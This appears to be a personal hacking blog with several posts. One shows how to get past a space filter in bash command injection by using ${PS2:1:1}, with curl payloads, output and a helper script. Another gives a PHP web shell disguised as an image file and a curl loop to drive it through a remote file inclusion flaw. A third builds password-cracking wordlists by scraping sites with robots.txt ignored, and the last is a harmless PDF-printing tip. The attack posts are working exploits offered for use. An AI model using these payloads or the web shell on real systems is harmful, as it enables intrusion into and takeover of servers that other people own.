Too Cool for Internet Explorer

Thursday, 24 July 2014

Bypassing bash command injections restrictions

I recently needed a way to execute arbitrary bash commands without using spaces during the injection.
Assume this example black-box scenario, where we have found a bash command injection, but some commands are filtered or not executed:
$(id):
$ curl "http://target/path/vulnerable.php?vulnvar=$(id)"
uid=48(apache) gid=48(apache) groups=14(uucp),48(apache),501(nagios),600(nagiocmd)
$(ls):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls)"
vulnerable.php
index.php
$(cat /etc/passwd):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat /etc/passwd)"
[no output]
(space filtered? or no permissions + stderr not forwarded? let's check it out..) $(ls >/tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls >/tmp/test)"
[no output]
$(cat</tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat</tmp/test)"
[no output]
(maybe the ls before was not executed) $(ls>/tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls>/tmp/test)"
[no output]
$(cat</tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat</tmp/test)"
vulnerable.php
index.php
We got it! It's the space that is filtered out and prevents our injection from succeeding.
But how do we execute a command that needs a parameter without using a space?
The solution is to obtain a space in some "bash way", and this is where shell parameter expansion comes into play. With this functionality we can extract a substring from an arbitrary variable:
${parameter:offset:length}

Expands to up to length characters of parameter starting at the character specified by offset. If length is omitted, expands to the substring of parameter starting at the character specified by offset. length and offset are arithmetic expressions (see Shell Arithmetic). This is referred to as Substring Expansion.
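A quick local sanity check (run in your own shell, nothing target-specific) shows how the offset and length slice a variable, and why index 1 of PS2 is the space we're after:

```shell
# local demo of substring expansion; W is a throwaway variable
W="hello world"
echo "${W:6:5}"   # prints: world

# PS2 defaults to '> ' in bash, so index 1 is a literal space
PS2='> '
echo "[${PS2:1:1}]"   # prints: [ ]
```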

First we need to find some variable containing a 'space' char, so let's search for it in the current environment:
$(declare>/tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(declare>/tmp/test)"
[no output]
$(cat</tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat</tmp/test)"
[...]
LESSOPEN='|/usr/bin/lesspipe.sh %s'
LINES=39
MAIL=/var/spool/mail/root
MAILCHECK=60
OLDPWD=/root
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/opt/ruby192/bin:/root/bin
PIPESTATUS=([0]="0")
PPID=8851
PRELINKING=yes
PRELINK_FULL_TIME_INTERVAL=14
PRELINK_NONRPM_CHECK_INTERVAL=7
PRELINK_OPTS=-mR
PROMPT_COMMAND='printf "\033]0;%s@%s:%s\007" "${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/~}"'
PS1='[\u@\h \W]\$ '
PS2='> '
PS4='+ '
[...]

so in this case we can use LESSOPEN, PS2, PS4 or some other variable; let's take PS2 for simplicity, and extract its space char:
${PS2:1:1}

now we can write arbitrary commands with parameters (and spaces), substituting each space with the ${PS2:1:1} string: $(ls${PS2:1:1}-l${PS2:1:1}/):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls${PS2:1:1}-l${PS2:1:1}/)"
drwxr-xr-x   2 root   root    4096 May  7 11:20 bin
drwxr-xr-x   4 root   root    3072 May 30  2012 boot
drwxr-xr-x   6 nagios neteye  4096 Aug 21  2013 data
drwxr-xr-x  10 root   root    3960 Jun 26 18:05 dev
drwxr-xr-x 126 root   root   12288 Jul 23 04:04 etc
drwxr-xr-x   5 root   root    4096 Jun 23 11:38 home
-rw-r--r--   1 root   root      31 Feb  4  2011 ks.log
drwxr-xr-x  14 root   root   12288 May  7 11:20 lib
drwx------   2 root   root   16384 Sep 25  2010 lost+found
drwxr-xr-x   3 root   root    4096 Jun 13 14:12 media
drwxr-xr-x   2 root   root    4096 Apr 20  2012 misc
drwxr-xr-x   2 root   root    4096 Aug 21  2013 mnt
dr-xr-xr-x   2 root   root    4096 May 10  2011 net
drwxr-xr-x   5 root   root    4096 Mar 26 17:20 opt
dr-xr-xr-x 131 root   root       0 Jun 13 14:12 proc
drwxr-x---  58 root   root   16384 Jul 24 09:26 root
drwxr-xr-x   2 root   root   12288 May  7 11:20 sbin
drwxr-xr-x   2 root   root    4096 May 11  2011 selinux
drwxr-xr-x   2 root   root    4096 May 11  2011 srv
drwxr-xr-x  11 root   root       0 Jun 13 14:12 sys
drwxrwxrwt   7 root   root   28672 Jul 24 11:47 tmp
drwxr-xr-x  15 root   root    4096 Oct 19  2011 usr
drwxr-xr-x  30 root   root    4096 Jul 18 09:06 var
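To avoid hand-editing every payload, the substitution itself can be scripted. A minimal sketch (nospace is a made-up helper name, and it assumes PS2 on the target still has its default '> ' value):

```shell
# hypothetical helper: rewrite a command so the payload contains no
# literal spaces; the target shell expands ${PS2:1:1} back into a
# space at runtime
nospace() {
  printf '%s' "$1" | sed 's/ /${PS2:1:1}/g'
}

nospace 'cat /etc/passwd'
# prints: cat${PS2:1:1}/etc/passwd
```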

happy hacking ;)

Friday, 31 August 2012

a (very) basic remote php shell

Hi folks, I'm finally back ;)

I know, there are several PHP shells out there, but I like to build everything on my own; that's the point and the fun part.
So yesterday, while exploiting a site with an RFI vuln, I reused my favorite "shell over HTTP" variant ;)

Here's the PHP code to upload:
$ cat Hacking/image.php.jpg
<?php
if ($_GET['cmd'] != "") {
    if ($_GET['plain'] != "") {
        echo shell_exec($_GET['cmd']);
    } else {
        echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
    }
}
?>

So we can use it with no "plain" argument from the browser, simply adding the "cmd" argument, and with the "plain=1" argument from the terminal:
$ while [ 1 ]; do echo -n "$ " && read CMD && CMD2=`echo $CMD | sed -e 's/ /+/g'` && curl "http://imavulnerablesite.com/vulnerable.php?parameters&plain=1&cmd=$CMD2+2%3E%261"; done
$ id
uid=48(apache) gid=48(apache) groups=14(uucp),48(apache)
$ ls -la
total 136
drwxr-xr-x  7 root root  4096 Aug 30 14:49 .
drwxr-xr-x 13 root root  4096 May  9 14:55 ..
-rw-r--r--  1 root root    36 Apr  3 17:43 .htaccess
[...]
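A more robust variant of that loop would encode the shell metacharacters instead of only mapping spaces to '+'. A minimal sketch of just the encoding step (covering only the characters used here, not full percent-encoding):

```shell
# encode space, '>' and '&' so they survive the query string;
# '+' decodes back to a space on the PHP side
CMD='ls -la 2>&1'
CMD2=$(printf '%s' "$CMD" | sed -e 's/ /+/g' -e 's/>/%3E/g' -e 's/&/%26/g')
echo "$CMD2"
# prints: ls+-la+2%3E%261
```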

Happy hacking ;)

Thursday, 16 April 2009

HowTo: A simple way to create a wordlist/dictionary

Hi all,

Last evening I needed to build a huge wordlist on my own, because I had to crack a salted password.
I started with the assumption that the password would likely be an Italian, a German or an English word.
So I searched the web for a large collection of words, and found an interesting website full of (old) books in (zipped) txt format. Nice.
After a quick look I noticed that downloading each book manually was going to be boring, so I started reading the wget manual, and realized what a great application it is =)
(Note: I'm not going to explain what every command parameter means; if you don't understand, RTFM ;) )

$ wget -r -nd -N -erobots=off -A.zip \
 -I cyberbooks \
 "http://www.cyberbooks.it/cyberbooks/autori/ind_a.htm"


That downloaded all the linked zip files on the page (and all subpages) into the current directory. Then I unzipped them:

$ for i in *.zip; do unzip -o "$i"; done


And finally I deleted the temporary files and kept only the txt files:

$ find . -maxdepth 1 -type f \! -name '*txt' \
 -exec rm -rf {} \;


Now, being sure that no files other than txt were left in the directory, I put them all together, removed some unneeded characters, put each word on a new line, sorted them alphabetically, removed unprintable characters and kept only unique entries:

$ cat *.txt | sed -e 's/://g' -e 's/\.//g'\
 -e 's/!//g' -e 's/?//g' -e 's/-//g' \
 -e 's/;//g' -e 's/,//g' -e 's/*//g' \
 -e 's/(//g' -e 's/)//g' | \
 awk '{printf "%s",$0}!//{print}' | \
 sed -e 's/ /\n/g' | sort -u | \
 strings > test.txt


This method produced a wordlist, but a lot of garbage remained around the words, so I decided to take the opposite approach: instead of excluding unwanted characters/strings, keep only what I needed and discard the rest. For this operation I used the 'tr' command.

$ cat *.txt | tr ' ' '\n' | \
 tr -d -c '[A-Za-z][\300-\374]\012\047' \
 | sort -u > part01.txt
$ cat part01.txt | wc -l
564486
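On a toy input the tr pipeline behaves like this (ASCII-only here for brevity; the real command above also keeps the accented \300-\374 range and the apostrophe):

```shell
# split on spaces, strip everything but letters and newlines, dedup
printf 'Hello, world! hello again\n' | tr ' ' '\n' \
  | tr -cd 'A-Za-z\n' | LC_ALL=C sort -u
# prints:
# Hello
# again
# hello
# world
```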


Nice. Half a million words in my list. But I needed more: John the Ripper checked them in a couple of milliseconds, and no password was cracked :-(

So let's fetch more data from the internet.. I picked a famous Italian news portal, repubblica.it, and downloaded the whole site.. some gigs of HTML files ^^

$ wget -r -nd -N -erobots=off \
 -R.jpg,.gif,.png,.js,.css \
 "http://www.repubblica.it/index.html"


I made a little script to handle the processing of each file, because some files had strange names and 'cat *' gave me errors.

$ cd repubblica/
$ for i in `ls`; do \ 
 echo "processing $i" && cat "$i" | \
 tr -c '[A-Za-z][\300-\374]\012\047' ' ' | \
 tr ' ' '\n' >> ../tmp02.txt; \
 done;
[...]
$ cat ../tmp02.txt | sort -u > ../part02.txt


Noticing that this gave only a small improvement, I decided to put a list of portals in a file and let wget download them all.
Then I repeated the same operation for each portal, and got a nice wordlist:
$ cat part0* | sort -u > final_wordlist.txt
$ wc -l final_wordlist.txt
827624 final_wordlist.txt
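The final merge can be sanity-checked on toy data; sort -u is what deduplicates entries coming from different partial lists (the words below are made up):

```shell
# two overlapping partial lists, merged and deduplicated like part0* above
{ printf 'casa\nhaus\n'; printf 'haus\nhouse\n'; } | LC_ALL=C sort -u
# prints:
# casa
# haus
# house
```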


The opportunities now are infinite, just download the whole internet and make a big wordlist.. then send it to me =)

happy cracking ;)

U238 alias 0xF0rD.

Sunday, 7 December 2008

Creating multipage print-ready books from PDF

Today I needed to print a manual in PDF format downloaded from the internet, and realized that printing all pages in A4 format would use too much paper and space. So I decided to opt for a multipage layout; but until today I had always printed the pages in sequential order, and this time I needed to create a double-sided two-page paginated spread.

This can easily be done with the open-source psutils package, which lets you print multi-page documents such as booklets and pamphlets.

The command is simply:

 $ pdf2ps $input - | psbook | psnup -2 | ps2pdf14 -sPAPERSIZE=a4 - $output 

where $input is the file with the pages in sequential order, and $output the printable PDF generated.